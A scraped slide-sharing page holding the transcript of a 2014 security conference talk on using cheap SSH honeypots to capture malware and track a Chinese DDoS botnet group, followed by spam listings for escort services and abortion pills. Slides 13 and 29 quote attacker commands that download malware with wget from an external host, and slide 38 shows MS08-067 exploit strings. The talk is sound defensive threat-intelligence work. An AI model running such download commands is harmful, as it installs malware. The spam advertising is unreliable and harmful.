How to hack or what is ethical hacking
 
AlienVault Brute Force Attacks- Keeping the Bots at Bay with AlienVault USM +...
AlienVault Brute Force Attacks- Keeping the Bots at Bay with AlienVault USM +...AlienVault Brute Force Attacks- Keeping the Bots at Bay with AlienVault USM +...
AlienVault Brute Force Attacks- Keeping the Bots at Bay with AlienVault USM +...
 
Web hacking 1.0
Web hacking 1.0Web hacking 1.0
Web hacking 1.0
 
Information about malwares and Attacks.pptx
Information about malwares and Attacks.pptxInformation about malwares and Attacks.pptx
Information about malwares and Attacks.pptx
 
FUEL_USERS_GROUP
FUEL_USERS_GROUPFUEL_USERS_GROUP
FUEL_USERS_GROUP
 
Detecting Intrusions and Malware - Eric Vanderburg - JurInnov
Detecting Intrusions and Malware - Eric Vanderburg - JurInnovDetecting Intrusions and Malware - Eric Vanderburg - JurInnov
Detecting Intrusions and Malware - Eric Vanderburg - JurInnov
 
Advanced Persistent Threats
Advanced Persistent ThreatsAdvanced Persistent Threats
Advanced Persistent Threats
 
BSidesJXN 2016: Finding a Company's BreakPoint
BSidesJXN 2016: Finding a Company's BreakPointBSidesJXN 2016: Finding a Company's BreakPoint
BSidesJXN 2016: Finding a Company's BreakPoint
 
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detection
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detectionAnti-virus Mechanisms and Various Ways to Bypass Antivirus detection
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detection
 
Python-Assisted Red-Teaming Operation
Python-Assisted Red-Teaming OperationPython-Assisted Red-Teaming Operation
Python-Assisted Red-Teaming Operation
 

Último

Best VIP Call Girls Noida Sector 39 Call Me: 8448380779
Best VIP Call Girls Noida Sector 39 Call Me: 8448380779Best VIP Call Girls Noida Sector 39 Call Me: 8448380779
Best VIP Call Girls Noida Sector 39 Call Me: 8448380779Delhi Call girls
 
Cheap Rate Call girls Sarita Vihar Delhi 9205541914 shot 1500 night
Cheap Rate Call girls Sarita Vihar Delhi 9205541914 shot 1500 nightCheap Rate Call girls Sarita Vihar Delhi 9205541914 shot 1500 night
Cheap Rate Call girls Sarita Vihar Delhi 9205541914 shot 1500 nightDelhi Call girls
 
Midocean dropshipping via API with DroFx
Midocean dropshipping via API with DroFxMidocean dropshipping via API with DroFx
Midocean dropshipping via API with DroFxolyaivanovalion
 
April 2024 - Crypto Market Report's Analysis
April 2024 - Crypto Market Report's AnalysisApril 2024 - Crypto Market Report's Analysis
April 2024 - Crypto Market Report's Analysismanisha194592
 
Chintamani Call Girls: 🍓 7737669865 🍓 High Profile Model Escorts | Bangalore ...
Chintamani Call Girls: 🍓 7737669865 🍓 High Profile Model Escorts | Bangalore ...Chintamani Call Girls: 🍓 7737669865 🍓 High Profile Model Escorts | Bangalore ...
Chintamani Call Girls: 🍓 7737669865 🍓 High Profile Model Escorts | Bangalore ...amitlee9823
 
Mature dropshipping via API with DroFx.pptx
Mature dropshipping via API with DroFx.pptxMature dropshipping via API with DroFx.pptx
Mature dropshipping via API with DroFx.pptxolyaivanovalion
 
Junnasandra Call Girls: 🍓 7737669865 🍓 High Profile Model Escorts | Bangalore...
Junnasandra Call Girls: 🍓 7737669865 🍓 High Profile Model Escorts | Bangalore...Junnasandra Call Girls: 🍓 7737669865 🍓 High Profile Model Escorts | Bangalore...
Junnasandra Call Girls: 🍓 7737669865 🍓 High Profile Model Escorts | Bangalore...amitlee9823
 
(PARI) Call Girls Wanowrie ( 7001035870 ) HI-Fi Pune Escorts Service
(PARI) Call Girls Wanowrie ( 7001035870 ) HI-Fi Pune Escorts Service(PARI) Call Girls Wanowrie ( 7001035870 ) HI-Fi Pune Escorts Service
(PARI) Call Girls Wanowrie ( 7001035870 ) HI-Fi Pune Escorts Serviceranjana rawat
 
Schema on read is obsolete. Welcome metaprogramming..pdf
Schema on read is obsolete. Welcome metaprogramming..pdfSchema on read is obsolete. Welcome metaprogramming..pdf
Schema on read is obsolete. Welcome metaprogramming..pdfLars Albertsson
 
Call me @ 9892124323 Cheap Rate Call Girls in Vashi with Real Photo 100% Secure
Call me @ 9892124323 Cheap Rate Call Girls in Vashi with Real Photo 100% SecureCall me @ 9892124323 Cheap Rate Call Girls in Vashi with Real Photo 100% Secure
Call me @ 9892124323 Cheap Rate Call Girls in Vashi with Real Photo 100% SecurePooja Nehwal
 
Smarteg dropshipping via API with DroFx.pptx
Smarteg dropshipping via API with DroFx.pptxSmarteg dropshipping via API with DroFx.pptx
Smarteg dropshipping via API with DroFx.pptxolyaivanovalion
 
CALL ON ➥8923113531 🔝Call Girls Chinhat Lucknow best sexual service Online
CALL ON ➥8923113531 🔝Call Girls Chinhat Lucknow best sexual service OnlineCALL ON ➥8923113531 🔝Call Girls Chinhat Lucknow best sexual service Online
CALL ON ➥8923113531 🔝Call Girls Chinhat Lucknow best sexual service Onlineanilsa9823
 
Ravak dropshipping via API with DroFx.pptx
Ravak dropshipping via API with DroFx.pptxRavak dropshipping via API with DroFx.pptx
Ravak dropshipping via API with DroFx.pptxolyaivanovalion
 
CebaBaby dropshipping via API with DroFX.pptx
CebaBaby dropshipping via API with DroFX.pptxCebaBaby dropshipping via API with DroFX.pptx
CebaBaby dropshipping via API with DroFX.pptxolyaivanovalion
 
Accredited-Transport-Cooperatives-Jan-2021-Web.pdf
Accredited-Transport-Cooperatives-Jan-2021-Web.pdfAccredited-Transport-Cooperatives-Jan-2021-Web.pdf
Accredited-Transport-Cooperatives-Jan-2021-Web.pdfadriantubila
 
Al Barsha Escorts $#$ O565212860 $#$ Escort Service In Al Barsha
Al Barsha Escorts $#$ O565212860 $#$ Escort Service In Al BarshaAl Barsha Escorts $#$ O565212860 $#$ Escort Service In Al Barsha
Al Barsha Escorts $#$ O565212860 $#$ Escort Service In Al BarshaAroojKhan71
 
Determinants of health, dimensions of health, positive health and spectrum of...
Determinants of health, dimensions of health, positive health and spectrum of...Determinants of health, dimensions of health, positive health and spectrum of...
Determinants of health, dimensions of health, positive health and spectrum of...shambhavirathore45
 

Último (20)

Best VIP Call Girls Noida Sector 39 Call Me: 8448380779
Best VIP Call Girls Noida Sector 39 Call Me: 8448380779Best VIP Call Girls Noida Sector 39 Call Me: 8448380779
Best VIP Call Girls Noida Sector 39 Call Me: 8448380779
 
Cheap Rate Call girls Sarita Vihar Delhi 9205541914 shot 1500 night
Cheap Rate Call girls Sarita Vihar Delhi 9205541914 shot 1500 nightCheap Rate Call girls Sarita Vihar Delhi 9205541914 shot 1500 night
Cheap Rate Call girls Sarita Vihar Delhi 9205541914 shot 1500 night
 
Midocean dropshipping via API with DroFx
Midocean dropshipping via API with DroFxMidocean dropshipping via API with DroFx
Midocean dropshipping via API with DroFx
 
April 2024 - Crypto Market Report's Analysis
April 2024 - Crypto Market Report's AnalysisApril 2024 - Crypto Market Report's Analysis
April 2024 - Crypto Market Report's Analysis
 
Chintamani Call Girls: 🍓 7737669865 🍓 High Profile Model Escorts | Bangalore ...
Chintamani Call Girls: 🍓 7737669865 🍓 High Profile Model Escorts | Bangalore ...Chintamani Call Girls: 🍓 7737669865 🍓 High Profile Model Escorts | Bangalore ...
Chintamani Call Girls: 🍓 7737669865 🍓 High Profile Model Escorts | Bangalore ...
 
Mature dropshipping via API with DroFx.pptx
Mature dropshipping via API with DroFx.pptxMature dropshipping via API with DroFx.pptx
Mature dropshipping via API with DroFx.pptx
 
Junnasandra Call Girls: 🍓 7737669865 🍓 High Profile Model Escorts | Bangalore...
Junnasandra Call Girls: 🍓 7737669865 🍓 High Profile Model Escorts | Bangalore...Junnasandra Call Girls: 🍓 7737669865 🍓 High Profile Model Escorts | Bangalore...
Junnasandra Call Girls: 🍓 7737669865 🍓 High Profile Model Escorts | Bangalore...
 
(PARI) Call Girls Wanowrie ( 7001035870 ) HI-Fi Pune Escorts Service
(PARI) Call Girls Wanowrie ( 7001035870 ) HI-Fi Pune Escorts Service(PARI) Call Girls Wanowrie ( 7001035870 ) HI-Fi Pune Escorts Service
(PARI) Call Girls Wanowrie ( 7001035870 ) HI-Fi Pune Escorts Service
 
Schema on read is obsolete. Welcome metaprogramming..pdf
Schema on read is obsolete. Welcome metaprogramming..pdfSchema on read is obsolete. Welcome metaprogramming..pdf
Schema on read is obsolete. Welcome metaprogramming..pdf
 
Call me @ 9892124323 Cheap Rate Call Girls in Vashi with Real Photo 100% Secure
Call me @ 9892124323 Cheap Rate Call Girls in Vashi with Real Photo 100% SecureCall me @ 9892124323 Cheap Rate Call Girls in Vashi with Real Photo 100% Secure
Call me @ 9892124323 Cheap Rate Call Girls in Vashi with Real Photo 100% Secure
 
Smarteg dropshipping via API with DroFx.pptx
Smarteg dropshipping via API with DroFx.pptxSmarteg dropshipping via API with DroFx.pptx
Smarteg dropshipping via API with DroFx.pptx
 
CALL ON ➥8923113531 🔝Call Girls Chinhat Lucknow best sexual service Online
CALL ON ➥8923113531 🔝Call Girls Chinhat Lucknow best sexual service OnlineCALL ON ➥8923113531 🔝Call Girls Chinhat Lucknow best sexual service Online
CALL ON ➥8923113531 🔝Call Girls Chinhat Lucknow best sexual service Online
 
Abortion pills in Doha Qatar (+966572737505 ! Get Cytotec
Abortion pills in Doha Qatar (+966572737505 ! Get CytotecAbortion pills in Doha Qatar (+966572737505 ! Get Cytotec
Abortion pills in Doha Qatar (+966572737505 ! Get Cytotec
 
Ravak dropshipping via API with DroFx.pptx
Ravak dropshipping via API with DroFx.pptxRavak dropshipping via API with DroFx.pptx
Ravak dropshipping via API with DroFx.pptx
 
CHEAP Call Girls in Saket (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Saket (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICECHEAP Call Girls in Saket (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Saket (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
 
CebaBaby dropshipping via API with DroFX.pptx
CebaBaby dropshipping via API with DroFX.pptxCebaBaby dropshipping via API with DroFX.pptx
CebaBaby dropshipping via API with DroFX.pptx
 
Accredited-Transport-Cooperatives-Jan-2021-Web.pdf
Accredited-Transport-Cooperatives-Jan-2021-Web.pdfAccredited-Transport-Cooperatives-Jan-2021-Web.pdf
Accredited-Transport-Cooperatives-Jan-2021-Web.pdf
 
Delhi 99530 vip 56974 Genuine Escort Service Call Girls in Kishangarh
Delhi 99530 vip 56974 Genuine Escort Service Call Girls in KishangarhDelhi 99530 vip 56974 Genuine Escort Service Call Girls in Kishangarh
Delhi 99530 vip 56974 Genuine Escort Service Call Girls in Kishangarh
 
Al Barsha Escorts $#$ O565212860 $#$ Escort Service In Al Barsha
Al Barsha Escorts $#$ O565212860 $#$ Escort Service In Al BarshaAl Barsha Escorts $#$ O565212860 $#$ Escort Service In Al Barsha
Al Barsha Escorts $#$ O565212860 $#$ Escort Service In Al Barsha
 
Determinants of health, dimensions of health, positive health and spectrum of...
Determinants of health, dimensions of health, positive health and spectrum of...Determinants of health, dimensions of health, positive health and spectrum of...
Determinants of health, dimensions of health, positive health and spectrum of...
 

BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns on the Cheap

  • 1. Ballin on a Budget Tracking Chinese threat actors on the cheap Andrew Morris
  • 2. a/s/l? • Andrew Morris • Security Engineer, iSEC Partners • Twitter - @Andrew___Morris • Email - andrew@morris.guru
  • 3. Overview • I’m going to tell you how I tracked a group of threat actors • I’m going to show you how you can too
  • 5. wtf is threat intel • Gathering intelligence on your adversaries (or bad guys in general) • Predicting and preventing attacks before they happen
  • 8. What we can’t do • As ballers on budgets, we don’t have access to a lot of good data • I’m assuming we do not have access to IR artifacts from targeted compromises • So we’re going to focus on mass attacks targeting the entire internet • We’re only going to track dumb groups with poor opsec • Today we’ll focus on a group that spreads malware via crappy SSH passwords
  • 9. How do you threat intelligence? • Set up a network of vulnerable machines exposed to the internet • Monitor them for attacks • Aggregate data • Locate, secure, and analyze artifacts • Locate key adversary infrastructure • ?????? • Profit!
  • 10. How to ball, on a budget • Setting up infrastructure - honeypots • Monitoring attacks - management interface, log review • Locating a group of attackers - Scraping their web servers • Figuring out who they are - Analyzing capabilities, correlating data, securing artifacts • Tracking their targets - Get creative! • Implementing defenses - Firewall rules, indicators, TTP write-ups
  • 11. Quick Malware Primer • Most malware uses the conventional C2 (command and control) model • Lots of botnets are used to perform DDOS (distributed denial of service) attacks
  • 12.
  • 13. Our targets • Guess passwords via SSH • uname -a • wget malware.run
  • 14. Step 2: Setting up Infrastructure
  • 16. What is a honeypot? • An intentionally vulnerable server or application that serves no business purpose • It’s only purpose is to attract attention of attackers
  • 17. Step 1 - Cheap Hosting • CloudAtCost • Pros: CHEAP - $35 dollar one time fee for a machine FOREVER • Cons: Crappy uptime, slow, unreliable
  • 18. Step 1.1 - OPSEC • Don’t reuse passwords • Don’t put any data on the machine • Don’t put anything personally identifiable on the machine • Assume the machine will be compromised at any moment
  • 19. Step 2 - Management • ThreatStream released an awesome open source centralized honeypot monitor called MHN (Managed Honey Network) • Looks like this
  • 20.
  • 21. Kippo • SSH Honeypot • Can record attacker sessions • Can grab artifacts attackers attempt to download with wget • Configure certain usernames and passwords
  • 22. Let the attacks begin!
  • 23. Data Analytics: Ballin on a Budget style # grep 'login attempt' * | cut -d' ' -f9 | sort | uniq -c | sort -n | tail -n25 | tac Top 25 passwords being used against your infrastructure?
  • 24. Data Analytics: Ballin on a Budget style (cont’d) # grep SSHService * | cut -d']' -f1 | cut -d',' -f3 | sort | uniq -c | sort -n | tail -n25 | tac Top 25 attacker IP addresses
  • 25. Tracker Real-time Alerting analytics: Ballin on a budget style https://github.com/andrew-morris/tracker/
  • 26. Quick recap • We learned what threat intel is • We learned how to set up and operate infrastructure
  • 27. Part 3: Locating the Group
  • 29. root@mgmt.muXXXXXXXXX.com:~# wget -O /etc/run_second=$q http://60.173.X.X:8080/14.17 --2014-08-07 10:25:11-- http:///etc/run_second=$q Connecting to None:80... connected. HTTP request sent, awaiting response... Credit to MalwareMustDie
  • 30. • Do some internet recon to see if anyone’s seen the binaries before • Search Google, VirusTotal, Malwr, etc for the md5 • That being said… this still gets me giddy
  • 31. what if I suck at reversing tho
  • 33. Malware Analysis: Ballin on a budget style • Use malwr.com and virustotal.com
  • 34.
  • 35. Part 4: CHUILANG aka a group I’ve been tracking
  • 36. Who I’m working on • I was getting hit a lot by a particular group • I secured some of their malware samples
  • 38. 1.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit 14.17: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped 183.60: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped 445.rar: RAR archive data, v1d, os: Win32 5900.rar: RAR archive data, v1d, os: Win32 Freebsd: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), statically linked, for FreeBSD 8.4, not stripped L24_36000: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped SSHSecureShellClient-3[1][1].2.9.zip: Zip archive data, at least v2.0 to extract elf: directory elf.tar.gz: POSIX tar archive (GNU) putty.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit tcpwra: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped xpoer: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped xsyer: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped ºì³¾Íø°²445Éø͸¹¤¾ß°ü.rar: RAR archive data, v1d, os: Win32 命令提示符.exe 入侵前需要 启的服务.bat FTP下载命令.txt SMB Connect OK! Make SMB Connection error:%d MS08-067 Exploit for CN by EMM@ph4nt0m.org %sIPC$ pipebrowser EMM! B041
  • 39. Reversing • Reversing this malware is a talk in itself • I suck at reversing so don’t listen to anything I tell you • I’ll post the IDB files on my github soon • Sometimes you don’t have to reverse anything
  • 40. Analysis Dropped a couple other binaries Added itself to startup The usual Contained DDOS capability Function names like “SYNFLOOD”, “UDPFLOOD”, etc
  • 41. Traffic I see…. IP addresses?
  • 43. # geo [+] IP Address: 202.102.199.68 Country: China Region: 01 City: Hefei Coordinates: 31.86390,117.28080 [+] IP Address: 218.104.78.2 Country: China Region: 01 City: Hefei Coordinates: 31.86390,117.28080 [+] IP Address: 211.138.180.2 Country: China Region: 01 City: Hefei Coordinates: 31.86390,117.28080 [+] IP Address: 211.91.88.129 Country: China Region: 22 City: Beijing Coordinates: 39.92890,116.38830 [+] IP Address: 202.38.64.1 Country: China Region: 01 City: Hefei Coordinates: 31.86390,117.28080 [+] IP Address: 58.242.2.2 Country: China Region: 01 City: Hefei Coordinates: 31.86390,117.28080 [+] IP Address: 202.102.200.101 Country: China Region: 01 City: Hefei Coordinates: 31.86390,117.28080 [+] IP Address: 202.102.213.68 Country: China Region: 01 City: Hefei Coordinates: 31.86390,117.28080 [+] IP Address: 202.102.192.68 Country: China Region: 01 City: Hefei Coordinates: 31.86390,117.28080 [+] IP Address: 61.132.163.68 Country: China Region: 01 City: Hefei Coordinates: 31.86390,117.28080 andrew$ geo 8.8.8.8 [+] IP Address: 8.8.8.8 Country: United States Region: CA City: Mountain View Coordinates: 37.38600,-122.08380 Geographical Correlation Engine: Ballin on a budget style
  • 44. Who are these IPs? CartoDB is AWESOME
  • 45. What are they? • DNS servers • Backbone routers • Etc
  • 46. C2 traffic • Those IPs were their DDOS targets • They were blasting instructions from the C2 • Let’s build our own client!
  • 47. Step 1: Spend hours staring at Wireshark Step 2: Try not to kill yourself
  • 50. Honeypot > Identifying threats > Tracking targets
  • 51. Recap! • We’ve captured malware • Analyzed it to identify capabilities • Reversed the protocol to identify the groups targets in real time
  • 53. End result? • Real-time tracking of the group’s targets, as they target them • Malware artifacts • C2 IP addresses to block from your network
  • 54. Summary of the Group • Based in China • Not advanced • Use easily guessable credentials and 6 year old exploits (MS08_067) • Goals: Build botnet to DDOS people • Somewhat smart about targeting
  • 55. Closing Notes The majority of this intel was gathered from one piece of malware from one campaign There are lots of these campaigns and attacks occurring at any moment You just need to find them
  • 56. TO DO! • Track more of these C2s • Figure out how to identify other compromised clients • Setup automated notification system to alert admins that they will be targeted • Setup live-updating map of their targets
  • 57. • Threat intelligence isn’t that hard • It’s easy to ball on a budget • Get out there and track some targets! • Don’t forget to share your info!
  • 58. Credit • MalwareMustDie - @malwaremustdie • Cartodb - cartodb.com • Malwr - malwr.com • VirusTotal - virustotal.com • CloudAtCost - cloudatcost.com • ThreatStream MHN - github.com/threatstream/mhn • Rob Blody (gir489) for helping me reverse some malware samples • Nat Puffer for getting me interested in this stuff